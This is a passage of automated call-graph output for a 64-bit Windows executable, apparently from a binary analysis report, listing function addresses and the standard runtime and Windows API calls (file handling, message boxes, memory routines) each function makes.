__std_exception_destroy 17350->17357 17352 7ff62c0f738a 17351->17352 17353 7ff62c0f738f 17352->17353 17354 7ff62c0f4630 49 API calls 17352->17354 17355 7ff62c0f2a50 54 API calls 17353->17355 17356 7ff62c0f73ae 17354->17356 17355->17357 17356->17353 17358 7ff62c0f4630 49 API calls 17356->17358 17357->17048 17359 7ff62c0f73ca 17358->17359 17359->17353 17379 7ff62c0f6e1c 17363->17379 17364 7ff62c0f6f3f 17365 7ff62c0fc550 _log10_special 8 API calls 17364->17365 17367 7ff62c0f1840 45 API calls 17367->17379 17368 7ff62c0f6faa 17370 7ff62c0f2710 54 API calls 17368->17370 17369 7ff62c0f1c80 49 API calls 17369->17379 17370->17364 17371 7ff62c0f6f97 17373 7ff62c0f2710 54 API calls 17371->17373 17372 7ff62c0f4560 10 API calls 17372->17379 17373->17364 17374 7ff62c0f7e20 52 API calls 17374->17379 17375 7ff62c0f2a50 54 API calls 17375->17379 17376 7ff62c0f6f84 17377 7ff62c0f2710 54 API calls 17376->17377 17377->17364 17378 7ff62c0f1600 118 API calls 17378->17379 17379->17364 17379->17367 17379->17368 17379->17369 17379->17371 17379->17372 17379->17374 17379->17375 17379->17376 17379->17378 17380 7ff62c0f6f6d 17379->17380 19089 7ff62c0f8e80 17382->19089 17399 7ff62c0fc850 17398->17399 19165 7ff62c0f6360 17416->19165 17424 7ff62c0f3399 17425 7ff62c0f3670 17424->17425 17426 7ff62c0f367e 17425->17426 17427 7ff62c0f368f 17426->17427 19438 7ff62c0f8e60 FreeLibrary 17426->19438 17427->17040 17436 7ff62c10546c EnterCriticalSection 17429->17436 17438 7ff62c0f36bc GetModuleFileNameW 17437->17438 17438->17129 17438->17130 17440 7ff62c0f92d2 17439->17440 17441 7ff62c0f92bf FindClose 17439->17441 17442 7ff62c0fc550 _log10_special 8 API calls 17440->17442 17441->17440 17443 7ff62c0f371a 17442->17443 17443->17134 17443->17135 17445 7ff62c0fc850 17444->17445 17446 7ff62c0f2c70 GetCurrentProcessId 17445->17446 17475 7ff62c0f26b0 17446->17475 17448 7ff62c0f2cb9 17479 7ff62c104bd8 17448->17479 17451 7ff62c0f26b0 48 API calls 17452 7ff62c0f2d34 FormatMessageW 17451->17452 17454 7ff62c0f2d7f 
MessageBoxW 17452->17454 17455 7ff62c0f2d6d 17452->17455 17457 7ff62c0fc550 _log10_special 8 API calls 17454->17457 17456 7ff62c0f26b0 48 API calls 17455->17456 17456->17454 17458 7ff62c0f2daf 17457->17458 17458->17147 17460 7ff62c0f9340 GetFinalPathNameByHandleW CloseHandle 17459->17460 17461 7ff62c0f3730 17459->17461 17460->17461 17461->17142 17461->17146 17463 7ff62c0f2834 17462->17463 17464 7ff62c0f26b0 48 API calls 17463->17464 17465 7ff62c0f2887 17464->17465 17466 7ff62c104bd8 48 API calls 17465->17466 17467 7ff62c0f28d0 MessageBoxW 17466->17467 17468 7ff62c0fc550 _log10_special 8 API calls 17467->17468 17469 7ff62c0f2900 17468->17469 17469->17147 17471 7ff62c0f946a WideCharToMultiByte 17470->17471 17474 7ff62c0f9495 17470->17474 17473 7ff62c0f94ab __std_exception_destroy 17471->17473 17471->17474 17472 7ff62c0f94b2 WideCharToMultiByte 17472->17473 17473->17141 17474->17472 17474->17473 17476 7ff62c0f26d5 17475->17476 17477 7ff62c104bd8 48 API calls 17476->17477 17478 7ff62c0f26f8 17477->17478 17478->17448 17480 7ff62c104c32 17479->17480 17481 7ff62c104c57 17480->17481 17483 7ff62c104c93 17480->17483 17482 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17481->17482 17485 7ff62c104c81 17482->17485 17497 7ff62c102f90 17483->17497 17487 7ff62c0fc550 _log10_special 8 API calls 17485->17487 17486 7ff62c104d74 17488 7ff62c10a948 __free_lconv_mon 11 API calls 17486->17488 17489 7ff62c0f2d04 17487->17489 17488->17485 17489->17451 17491 7ff62c104d9a 17491->17486 17493 7ff62c104da4 17491->17493 17492 7ff62c104d49 17494 7ff62c10a948 __free_lconv_mon 11 API calls 17492->17494 17496 7ff62c10a948 __free_lconv_mon 11 API calls 17493->17496 17494->17485 17495 7ff62c104d40 17495->17486 17495->17492 17496->17485 17498 7ff62c102fce 17497->17498 17499 7ff62c102fbe 17497->17499 17500 7ff62c102fd7 17498->17500 17505 7ff62c103005 17498->17505 17503 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17499->17503 17501 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 
17500->17501 17502 7ff62c102ffd 17501->17502 17502->17486 17502->17491 17502->17492 17502->17495 17503->17502 17505->17499 17505->17502 17508 7ff62c1039a4 17505->17508 17541 7ff62c1033f0 17505->17541 17578 7ff62c102b80 17505->17578 17509 7ff62c103a57 17508->17509 17510 7ff62c1039e6 17508->17510 17513 7ff62c103ab0 17509->17513 17514 7ff62c103a5c 17509->17514 17511 7ff62c103a81 17510->17511 17512 7ff62c1039ec 17510->17512 17601 7ff62c101d54 17511->17601 17515 7ff62c1039f1 17512->17515 17516 7ff62c103a20 17512->17516 17520 7ff62c103ac7 17513->17520 17522 7ff62c103aba 17513->17522 17526 7ff62c103abf 17513->17526 17517 7ff62c103a91 17514->17517 17518 7ff62c103a5e 17514->17518 17515->17520 17523 7ff62c1039f7 17515->17523 17516->17523 17516->17526 17608 7ff62c101944 17517->17608 17521 7ff62c103a00 17518->17521 17530 7ff62c103a6d 17518->17530 17615 7ff62c1046ac 17520->17615 17539 7ff62c103af0 17521->17539 17581 7ff62c104158 17521->17581 17522->17511 17522->17526 17523->17521 17529 7ff62c103a32 17523->17529 17537 7ff62c103a1b 17523->17537 17526->17539 17619 7ff62c102164 17526->17619 17529->17539 17591 7ff62c104494 17529->17591 17530->17511 17531 7ff62c103a72 17530->17531 17531->17539 17597 7ff62c104558 17531->17597 17533 7ff62c0fc550 _log10_special 8 API calls 17534 7ff62c103dea 17533->17534 17534->17505 17537->17539 17540 7ff62c103cdc 17537->17540 17626 7ff62c1047c0 17537->17626 17539->17533 17540->17539 17632 7ff62c10ea08 17540->17632 17542 7ff62c103414 17541->17542 17543 7ff62c1033fe 17541->17543 17544 7ff62c103454 17542->17544 17545 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17542->17545 17543->17544 17546 7ff62c103a57 17543->17546 17547 7ff62c1039e6 17543->17547 17544->17505 17545->17544 17550 7ff62c103ab0 17546->17550 17551 7ff62c103a5c 17546->17551 17548 7ff62c103a81 17547->17548 17549 7ff62c1039ec 17547->17549 17556 7ff62c101d54 38 API calls 17548->17556 17552 7ff62c1039f1 17549->17552 17553 7ff62c103a20 17549->17553 17557 7ff62c103ac7 17550->17557 17559 
7ff62c103aba 17550->17559 17563 7ff62c103abf 17550->17563 17554 7ff62c103a91 17551->17554 17555 7ff62c103a5e 17551->17555 17552->17557 17560 7ff62c1039f7 17552->17560 17553->17560 17553->17563 17561 7ff62c101944 38 API calls 17554->17561 17558 7ff62c103a00 17555->17558 17566 7ff62c103a6d 17555->17566 17573 7ff62c103a1b 17556->17573 17564 7ff62c1046ac 45 API calls 17557->17564 17562 7ff62c104158 47 API calls 17558->17562 17576 7ff62c103af0 17558->17576 17559->17548 17559->17563 17560->17558 17567 7ff62c103a32 17560->17567 17560->17573 17561->17573 17562->17573 17565 7ff62c102164 38 API calls 17563->17565 17563->17576 17564->17573 17565->17573 17566->17548 17568 7ff62c103a72 17566->17568 17569 7ff62c104494 46 API calls 17567->17569 17567->17576 17571 7ff62c104558 37 API calls 17568->17571 17568->17576 17569->17573 17570 7ff62c0fc550 _log10_special 8 API calls 17572 7ff62c103dea 17570->17572 17571->17573 17572->17505 17574 7ff62c1047c0 45 API calls 17573->17574 17573->17576 17577 7ff62c103cdc 17573->17577 17574->17577 17575 7ff62c10ea08 46 API calls 17575->17577 17576->17570 17577->17575 17577->17576 17798 7ff62c100fc8 17578->17798 17582 7ff62c10417e 17581->17582 17644 7ff62c100b80 17582->17644 17587 7ff62c1047c0 45 API calls 17590 7ff62c1042c3 17587->17590 17588 7ff62c104351 17588->17537 17588->17588 17589 7ff62c1047c0 45 API calls 17589->17588 17590->17588 17590->17589 17590->17590 17593 7ff62c1044c9 17591->17593 17592 7ff62c10450e 17592->17537 17593->17592 17594 7ff62c1044e7 17593->17594 17595 7ff62c1047c0 45 API calls 17593->17595 17596 7ff62c10ea08 46 API calls 17594->17596 17595->17594 17596->17592 17600 7ff62c104579 17597->17600 17598 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17599 7ff62c1045aa 17598->17599 17599->17537 17600->17598 17600->17599 17602 7ff62c101d87 17601->17602 17603 7ff62c101db6 17602->17603 17605 7ff62c101e73 17602->17605 17607 7ff62c101df3 17603->17607 17771 7ff62c100c28 17603->17771 17606 7ff62c10a814 _invalid_parameter_noinfo 37 
API calls 17605->17606 17606->17607 17607->17537 17609 7ff62c101977 17608->17609 17610 7ff62c1019a6 17609->17610 17612 7ff62c101a63 17609->17612 17611 7ff62c100c28 12 API calls 17610->17611 17614 7ff62c1019e3 17610->17614 17611->17614 17613 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17612->17613 17613->17614 17614->17537 17616 7ff62c1046ef 17615->17616 17618 7ff62c1046f3 __crtLCMapStringW 17616->17618 17779 7ff62c104748 17616->17779 17618->17537 17620 7ff62c102197 17619->17620 17621 7ff62c1021c6 17620->17621 17623 7ff62c102283 17620->17623 17622 7ff62c100c28 12 API calls 17621->17622 17625 7ff62c102203 17621->17625 17622->17625 17624 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17623->17624 17624->17625 17625->17537 17627 7ff62c1047d7 17626->17627 17783 7ff62c10d9b8 17627->17783 17633 7ff62c10ea39 17632->17633 17639 7ff62c10ea47 17632->17639 17634 7ff62c10ea67 17633->17634 17637 7ff62c1047c0 45 API calls 17633->17637 17633->17639 17635 7ff62c10ea78 17634->17635 17636 7ff62c10ea9f 17634->17636 17791 7ff62c1100a0 17635->17791 17636->17639 17640 7ff62c10eac9 17636->17640 17641 7ff62c10eb2a 17636->17641 17637->17634 17639->17540 17640->17639 17643 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 17640->17643 17642 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 17641->17642 17642->17639 17643->17639 17645 7ff62c100bb7 17644->17645 17651 7ff62c100ba6 17644->17651 17646 7ff62c10d5fc _fread_nolock 12 API calls 17645->17646 17645->17651 17647 7ff62c100be4 17646->17647 17648 7ff62c100bf8 17647->17648 17649 7ff62c10a948 __free_lconv_mon 11 API calls 17647->17649 17650 7ff62c10a948 __free_lconv_mon 11 API calls 17648->17650 17649->17648 17650->17651 17652 7ff62c10e570 17651->17652 17653 7ff62c10e58d 17652->17653 17655 7ff62c10e5c0 17652->17655 17654 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17653->17654 17664 7ff62c1042a1 17654->17664 17655->17653 17656 7ff62c10e5f2 17655->17656 17660 7ff62c10e705 17656->17660 17669 7ff62c10e63a 17656->17669 17657 
7ff62c10e7f7 17698 7ff62c10da5c 17657->17698 17658 7ff62c10e7bd 17691 7ff62c10ddf4 17658->17691 17660->17657 17660->17658 17661 7ff62c10e78c 17660->17661 17663 7ff62c10e74f 17660->17663 17666 7ff62c10e745 17660->17666 17684 7ff62c10e0d4 17661->17684 17674 7ff62c10e304 17663->17674 17664->17587 17664->17590 17666->17658 17668 7ff62c10e74a 17666->17668 17668->17661 17668->17663 17669->17664 17670 7ff62c10a4a4 __std_exception_copy 37 API calls 17669->17670 17671 7ff62c10e6f2 17670->17671 17671->17664 17672 7ff62c10a900 _isindst 17 API calls 17671->17672 17673 7ff62c10e854 17672->17673 17707 7ff62c1140ac 17674->17707 17678 7ff62c10e3ac 17679 7ff62c10e401 17678->17679 17681 7ff62c10e3cc 17678->17681 17683 7ff62c10e3b0 17678->17683 17760 7ff62c10def0 17679->17760 17681->17681 17756 7ff62c10e1ac 17681->17756 17683->17664 17685 7ff62c1140ac 38 API calls 17684->17685 17686 7ff62c10e11e 17685->17686 17687 7ff62c113af4 37 API calls 17686->17687 17688 7ff62c10e16e 17687->17688 17689 7ff62c10e172 17688->17689 17690 7ff62c10e1ac 45 API calls 17688->17690 17689->17664 17690->17689 17692 7ff62c1140ac 38 API calls 17691->17692 17693 7ff62c10de3f 17692->17693 17694 7ff62c113af4 37 API calls 17693->17694 17695 7ff62c10de97 17694->17695 17696 7ff62c10de9b 17695->17696 17697 7ff62c10def0 45 API calls 17695->17697 17696->17664 17697->17696 17699 7ff62c10daa1 17698->17699 17700 7ff62c10dad4 17698->17700 17701 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17699->17701 17702 7ff62c10daec 17700->17702 17705 7ff62c10db6d 17700->17705 17704 7ff62c10dacd memcpy_s 17701->17704 17703 7ff62c10ddf4 46 API calls 17702->17703 17703->17704 17704->17664 17705->17704 17706 7ff62c1047c0 45 API calls 17705->17706 17706->17704 17708 7ff62c1140ff fegetenv 17707->17708 17709 7ff62c117e2c 37 API calls 17708->17709 17714 7ff62c114152 17709->17714 17710 7ff62c11417f 17713 7ff62c10a4a4 __std_exception_copy 37 API calls 17710->17713 17711 7ff62c114242 17712 7ff62c117e2c 37 API calls 17711->17712 17715 
7ff62c11426c 17712->17715 17716 7ff62c1141fd 17713->17716 17714->17711 17717 7ff62c11416d 17714->17717 17718 7ff62c11421c 17714->17718 17719 7ff62c117e2c 37 API calls 17715->17719 17720 7ff62c115324 17716->17720 17726 7ff62c114205 17716->17726 17717->17710 17717->17711 17721 7ff62c10a4a4 __std_exception_copy 37 API calls 17718->17721 17722 7ff62c11427d 17719->17722 17724 7ff62c10a900 _isindst 17 API calls 17720->17724 17721->17716 17723 7ff62c118020 20 API calls 17722->17723 17730 7ff62c1142e6 memcpy_s 17723->17730 17725 7ff62c115339 17724->17725 17727 7ff62c0fc550 _log10_special 8 API calls 17726->17727 17728 7ff62c10e351 17727->17728 17752 7ff62c113af4 17728->17752 17729 7ff62c11468f memcpy_s 17730->17729 17731 7ff62c114327 memcpy_s 17730->17731 17736 7ff62c104f08 _get_daylight 11 API calls 17730->17736 17747 7ff62c114c6b memcpy_s 17731->17747 17748 7ff62c114783 memcpy_s 17731->17748 17732 7ff62c113c10 37 API calls 17738 7ff62c1150e7 17732->17738 17733 7ff62c1149cf 17733->17732 17734 7ff62c11533c memcpy_s 37 API calls 17734->17733 17735 7ff62c11497b 17735->17733 17735->17734 17737 7ff62c114760 17736->17737 17739 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17737->17739 17740 7ff62c11533c memcpy_s 37 API calls 17738->17740 17750 7ff62c115142 17738->17750 17739->17731 17740->17750 17741 7ff62c1152c8 17743 7ff62c117e2c 37 API calls 17741->17743 17742 7ff62c104f08 11 API calls _get_daylight 17742->17747 17743->17726 17744 7ff62c104f08 11 API calls _get_daylight 17744->17748 17745 7ff62c113c10 37 API calls 17745->17750 17746 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 17746->17748 17747->17733 17747->17735 17747->17742 17751 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 17747->17751 17748->17735 17748->17744 17748->17746 17749 7ff62c11533c memcpy_s 37 API calls 17749->17750 17750->17741 17750->17745 17750->17749 17751->17747 17753 7ff62c113b13 17752->17753 17754 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17753->17754 17755 7ff62c113b3e 
memcpy_s 17753->17755 17754->17755 17755->17678 17757 7ff62c10e1d8 memcpy_s 17756->17757 17758 7ff62c1047c0 45 API calls 17757->17758 17759 7ff62c10e292 memcpy_s 17757->17759 17758->17759 17759->17683 17761 7ff62c10df2b 17760->17761 17764 7ff62c10df78 memcpy_s 17760->17764 17762 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17761->17762 17763 7ff62c10df57 17762->17763 17763->17683 17765 7ff62c10dfe3 17764->17765 17767 7ff62c1047c0 45 API calls 17764->17767 17766 7ff62c10a4a4 __std_exception_copy 37 API calls 17765->17766 17770 7ff62c10e025 memcpy_s 17766->17770 17767->17765 17768 7ff62c10a900 _isindst 17 API calls 17769 7ff62c10e0d0 17768->17769 17770->17768 17772 7ff62c100c5f 17771->17772 17773 7ff62c100c4e 17771->17773 17772->17773 17774 7ff62c10d5fc _fread_nolock 12 API calls 17772->17774 17773->17607 17775 7ff62c100c90 17774->17775 17776 7ff62c100ca4 17775->17776 17777 7ff62c10a948 __free_lconv_mon 11 API calls 17775->17777 17778 7ff62c10a948 __free_lconv_mon 11 API calls 17776->17778 17777->17776 17778->17773 17780 7ff62c10476e 17779->17780 17781 7ff62c104766 17779->17781 17780->17618 17782 7ff62c1047c0 45 API calls 17781->17782 17782->17780 17784 7ff62c10d9d1 17783->17784 17786 7ff62c1047ff 17783->17786 17785 7ff62c113304 45 API calls 17784->17785 17784->17786 17785->17786 17787 7ff62c10da24 17786->17787 17788 7ff62c10da3d 17787->17788 17790 7ff62c10480f 17787->17790 17789 7ff62c112650 45 API calls 17788->17789 17788->17790 17789->17790 17790->17540 17794 7ff62c116d88 17791->17794 17797 7ff62c116dec 17794->17797 17795 7ff62c0fc550 _log10_special 8 API calls 17796 7ff62c1100bd 17795->17796 17796->17639 17797->17795 17799 7ff62c10100f 17798->17799 17800 7ff62c100ffd 17798->17800 17802 7ff62c10101d 17799->17802 17807 7ff62c101059 17799->17807 17801 7ff62c104f08 _get_daylight 11 API calls 17800->17801 17803 7ff62c101002 17801->17803 17805 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17802->17805 17804 7ff62c10a8e0 _invalid_parameter_noinfo 37 API 
calls 17803->17804 17814 7ff62c10100d 17804->17814 17805->17814 17806 7ff62c1013d5 17809 7ff62c104f08 _get_daylight 11 API calls 17806->17809 17806->17814 17807->17806 17808 7ff62c104f08 _get_daylight 11 API calls 17807->17808 17810 7ff62c1013ca 17808->17810 17811 7ff62c101669 17809->17811 17813 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17810->17813 17812 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17811->17812 17812->17814 17813->17806 17814->17505 17816 7ff62c100704 17815->17816 17843 7ff62c100464 17816->17843 17818 7ff62c10071d 17818->17158 17855 7ff62c1003bc 17819->17855 17823 7ff62c0fc850 17822->17823 17824 7ff62c0f2930 GetCurrentProcessId 17823->17824 17825 7ff62c0f1c80 49 API calls 17824->17825 17826 7ff62c0f2979 17825->17826 17869 7ff62c104984 17826->17869 17831 7ff62c0f1c80 49 API calls 17832 7ff62c0f29ff 17831->17832 17899 7ff62c0f2620 17832->17899 17835 7ff62c0fc550 _log10_special 8 API calls 17836 7ff62c0f2a31 17835->17836 17836->17197 17838 7ff62c100119 17837->17838 17842 7ff62c0f1b89 17837->17842 17839 7ff62c104f08 _get_daylight 11 API calls 17838->17839 17840 7ff62c10011e 17839->17840 17841 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17840->17841 17841->17842 17842->17196 17842->17197 17844 7ff62c1004ce 17843->17844 17845 7ff62c10048e 17843->17845 17844->17845 17846 7ff62c1004da 17844->17846 17847 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17845->17847 17854 7ff62c10546c EnterCriticalSection 17846->17854 17850 7ff62c1004b5 17847->17850 17850->17818 17856 7ff62c0f1a20 17855->17856 17857 7ff62c1003e6 17855->17857 17856->17165 17856->17166 17857->17856 17858 7ff62c1003f5 memcpy_s 17857->17858 17859 7ff62c100432 17857->17859 17862 7ff62c104f08 _get_daylight 11 API calls 17858->17862 17868 7ff62c10546c EnterCriticalSection 17859->17868 17864 7ff62c10040a 17862->17864 17865 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17864->17865 17865->17856 17873 7ff62c1049de 17869->17873 17870 7ff62c104a03 17871 7ff62c10a814 
45 API calls 16759->16760 16761 7ff62c118f71 16760->16761 16764 7ff62c118bc8 16761->16764 16766 7ff62c118c16 16764->16766 16765 7ff62c0fc550 _log10_special 8 API calls 16767 7ff62c117205 16765->16767 16768 7ff62c118c9d 16766->16768 16770 7ff62c118c88 GetCPInfo 16766->16770 16791 7ff62c118ca1 16766->16791 16767->16248 16767->16252 16769 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16768->16769 16768->16791 16771 7ff62c118d35 16769->16771 16770->16768 16770->16791 16772 7ff62c10d5fc _fread_nolock 12 API calls 16771->16772 16773 7ff62c118d6c 16771->16773 16771->16791 16772->16773 16774 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16773->16774 16773->16791 16775 7ff62c118dda 16774->16775 16776 7ff62c118ebc 16775->16776 16777 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16775->16777 16778 7ff62c10a948 __free_lconv_mon 11 API calls 16776->16778 16776->16791 16779 7ff62c118e00 16777->16779 16778->16791 16779->16776 16780 7ff62c10d5fc _fread_nolock 12 API calls 16779->16780 16781 7ff62c118e2d 16779->16781 16780->16781 16781->16776 16782 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16781->16782 16783 7ff62c118ea4 16782->16783 16784 7ff62c118eaa 16783->16784 16785 7ff62c118ec4 16783->16785 16784->16776 16787 7ff62c10a948 __free_lconv_mon 11 API calls 16784->16787 16793 7ff62c10ef68 16785->16793 16787->16776 16789 7ff62c118f03 16789->16791 16792 7ff62c10a948 __free_lconv_mon 11 API calls 16789->16792 16790 7ff62c10a948 __free_lconv_mon 11 API calls 16790->16789 16791->16765 16792->16791 16794 7ff62c10ed10 __crtLCMapStringW 5 API calls 16793->16794 16795 7ff62c10efa6 16794->16795 16796 7ff62c10efae 16795->16796 16797 7ff62c10f1d0 __crtLCMapStringW 5 API calls 16795->16797 16796->16789 16796->16790 16798 7ff62c10f017 CompareStringW 16797->16798 16798->16796 16800 7ff62c117c5a HeapSize 16799->16800 16801 7ff62c117c41 16799->16801 16802 7ff62c104f08 _get_daylight 11 API calls 16801->16802 16803 7ff62c117c46 16802->16803 16804 7ff62c10a8e0 _invalid_parameter_noinfo 37 API 
calls 16803->16804 16805 7ff62c117c51 16804->16805 16805->16257 16807 7ff62c117c89 16806->16807 16808 7ff62c117c93 16806->16808 16809 7ff62c10d5fc _fread_nolock 12 API calls 16807->16809 16810 7ff62c117c98 16808->16810 16816 7ff62c117c9f _get_daylight 16808->16816 16815 7ff62c117c91 16809->16815 16813 7ff62c10a948 __free_lconv_mon 11 API calls 16810->16813 16811 7ff62c117cd2 HeapReAlloc 16811->16815 16811->16816 16812 7ff62c117ca5 16814 7ff62c104f08 _get_daylight 11 API calls 16812->16814 16813->16815 16814->16815 16815->16260 16816->16811 16816->16812 16817 7ff62c113590 _get_daylight 2 API calls 16816->16817 16817->16816 16819 7ff62c10ed10 __crtLCMapStringW 5 API calls 16818->16819 16820 7ff62c10ef44 16819->16820 16820->16266 16822 7ff62c1054fa 16821->16822 16823 7ff62c1054d6 16821->16823 16824 7ff62c105554 16822->16824 16825 7ff62c1054ff 16822->16825 16827 7ff62c10a948 __free_lconv_mon 11 API calls 16823->16827 16832 7ff62c1054e5 16823->16832 16826 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16824->16826 16828 7ff62c105514 16825->16828 16829 7ff62c10a948 __free_lconv_mon 11 API calls 16825->16829 16825->16832 16835 7ff62c105570 16826->16835 16827->16832 16830 7ff62c10d5fc _fread_nolock 12 API calls 16828->16830 16829->16828 16830->16832 16831 7ff62c105577 GetLastError 16843 7ff62c104e7c 16831->16843 16832->16269 16832->16271 16833 7ff62c1055b2 16833->16832 16837 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16833->16837 16835->16831 16835->16833 16836 7ff62c1055a5 16835->16836 16839 7ff62c10a948 __free_lconv_mon 11 API calls 16835->16839 16840 7ff62c10d5fc _fread_nolock 12 API calls 16836->16840 16841 7ff62c1055f6 16837->16841 16839->16836 16840->16833 16841->16831 16841->16832 16842 7ff62c104f08 _get_daylight 11 API calls 16842->16832 16844 7ff62c10b2c8 _get_daylight 11 API calls 16843->16844 16845 7ff62c104e89 __free_lconv_mon 16844->16845 16846 7ff62c10b2c8 _get_daylight 11 API calls 16845->16846 16847 7ff62c104eab 16846->16847 16847->16842 16848 
7ff62c0fbae0 16849 7ff62c0fbb0e 16848->16849 16850 7ff62c0fbaf5 16848->16850 16850->16849 16852 7ff62c10d5fc 12 API calls 16850->16852 16851 7ff62c0fbb6e 16852->16851 19773 7ff62c109d50 19776 7ff62c109ccc 19773->19776 19783 7ff62c1102d8 EnterCriticalSection 19776->19783 19922 7ff62c10afd0 19923 7ff62c10afea 19922->19923 19924 7ff62c10afd5 19922->19924 19928 7ff62c10aff0 19924->19928 19929 7ff62c10b03a 19928->19929 19930 7ff62c10b032 19928->19930 19932 7ff62c10a948 __free_lconv_mon 11 API calls 19929->19932 19931 7ff62c10a948 __free_lconv_mon 11 API calls 19930->19931 19931->19929 19933 7ff62c10b047 19932->19933 19934 7ff62c10a948 __free_lconv_mon 11 API calls 19933->19934 19935 7ff62c10b054 19934->19935 19936 7ff62c10a948 __free_lconv_mon 11 API calls 19935->19936 19937 7ff62c10b061 19936->19937 19938 7ff62c10a948 __free_lconv_mon 11 API calls 19937->19938 19939 7ff62c10b06e 19938->19939 19940 7ff62c10a948 __free_lconv_mon 11 API calls 19939->19940 19941 7ff62c10b07b 19940->19941 19942 7ff62c10a948 __free_lconv_mon 11 API calls 19941->19942 19943 7ff62c10b088 19942->19943 19944 7ff62c10a948 __free_lconv_mon 11 API calls 19943->19944 19945 7ff62c10b095 19944->19945 19946 7ff62c10a948 __free_lconv_mon 11 API calls 19945->19946 19947 7ff62c10b0a5 19946->19947 19948 7ff62c10a948 __free_lconv_mon 11 API calls 19947->19948 19949 7ff62c10b0b5 19948->19949 19954 7ff62c10ae94 19949->19954 19968 7ff62c1102d8 EnterCriticalSection 19954->19968 19970 7ff62c105410 19971 7ff62c10541b 19970->19971 19979 7ff62c10f2a4 19971->19979 19992 7ff62c1102d8 EnterCriticalSection 19979->19992 20643 7ff62c10c520 20654 7ff62c1102d8 EnterCriticalSection 20643->20654 20390 7ff62c1116b0 20401 7ff62c1173e4 20390->20401 20402 7ff62c1173f1 20401->20402 20403 7ff62c10a948 __free_lconv_mon 11 API calls 20402->20403 20405 7ff62c11740d 20402->20405 20403->20402 20404 7ff62c10a948 __free_lconv_mon 11 API calls 20404->20405 20405->20404 20406 7ff62c1116b9 20405->20406 20407 7ff62c1102d8 
EnterCriticalSection 20406->20407 20007 7ff62c11adfe 20008 7ff62c11ae17 20007->20008 20009 7ff62c11ae0d 20007->20009 20011 7ff62c110338 LeaveCriticalSection 20009->20011 19487 7ff62c105628 19488 7ff62c105642 19487->19488 19489 7ff62c10565f 19487->19489 19491 7ff62c104ee8 _fread_nolock 11 API calls 19488->19491 19489->19488 19490 7ff62c105672 CreateFileW 19489->19490 19492 7ff62c1056dc 19490->19492 19493 7ff62c1056a6 19490->19493 19494 7ff62c105647 19491->19494 19538 7ff62c105c04 19492->19538 19512 7ff62c10577c GetFileType 19493->19512 19497 7ff62c104f08 _get_daylight 11 API calls 19494->19497 19498 7ff62c10564f 19497->19498 19501 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19498->19501 19507 7ff62c10565a 19501->19507 19502 7ff62c1056d1 CloseHandle 19502->19507 19503 7ff62c1056bb CloseHandle 19503->19507 19504 7ff62c1056e5 19508 7ff62c104e7c _fread_nolock 11 API calls 19504->19508 19505 7ff62c105710 19559 7ff62c1059c4 19505->19559 19510 7ff62c1056ef 19508->19510 19510->19507 19513 7ff62c1057ca 19512->19513 19514 7ff62c105887 19512->19514 19517 7ff62c1057f6 GetFileInformationByHandle 19513->19517 19522 7ff62c105b00 21 API calls 19513->19522 19515 7ff62c1058b1 19514->19515 19516 7ff62c10588f 19514->19516 19521 7ff62c1058d4 PeekNamedPipe 19515->19521 19526 7ff62c105872 19515->19526 19518 7ff62c105893 19516->19518 19519 7ff62c1058a2 GetLastError 19516->19519 19517->19519 19520 7ff62c10581f 19517->19520 19523 7ff62c104f08 _get_daylight 11 API calls 19518->19523 19525 7ff62c104e7c _fread_nolock 11 API calls 19519->19525 19524 7ff62c1059c4 51 API calls 19520->19524 19521->19526 19527 7ff62c1057e4 19522->19527 19523->19526 19528 7ff62c10582a 19524->19528 19525->19526 19529 7ff62c0fc550 _log10_special 8 API calls 19526->19529 19527->19517 19527->19526 19576 7ff62c105924 19528->19576 19530 7ff62c1056b4 19529->19530 19530->19502 19530->19503 19533 7ff62c105924 10 API calls 19534 7ff62c105849 19533->19534 19535 7ff62c105924 10 API calls 19534->19535 19536 7ff62c10585a 
19535->19536 19536->19526 19537 7ff62c104f08 _get_daylight 11 API calls 19536->19537 19537->19526 19539 7ff62c105c3a 19538->19539 19540 7ff62c104f08 _get_daylight 11 API calls 19539->19540 19541 7ff62c105cd2 __std_exception_destroy 19539->19541 19543 7ff62c105c4c 19540->19543 19542 7ff62c0fc550 _log10_special 8 API calls 19541->19542 19544 7ff62c1056e1 19542->19544 19545 7ff62c104f08 _get_daylight 11 API calls 19543->19545 19544->19504 19544->19505 19546 7ff62c105c54 19545->19546 19547 7ff62c107e08 45 API calls 19546->19547 19548 7ff62c105c69 19547->19548 19549 7ff62c105c71 19548->19549 19550 7ff62c105c7b 19548->19550 19551 7ff62c104f08 _get_daylight 11 API calls 19549->19551 19552 7ff62c104f08 _get_daylight 11 API calls 19550->19552 19555 7ff62c105c76 19551->19555 19553 7ff62c105c80 19552->19553 19553->19541 19554 7ff62c104f08 _get_daylight 11 API calls 19553->19554 19556 7ff62c105c8a 19554->19556 19555->19541 19557 7ff62c105cc4 GetDriveTypeW 19555->19557 19558 7ff62c107e08 45 API calls 19556->19558 19557->19541 19558->19555 19560 7ff62c1059ec 19559->19560 19568 7ff62c10571d 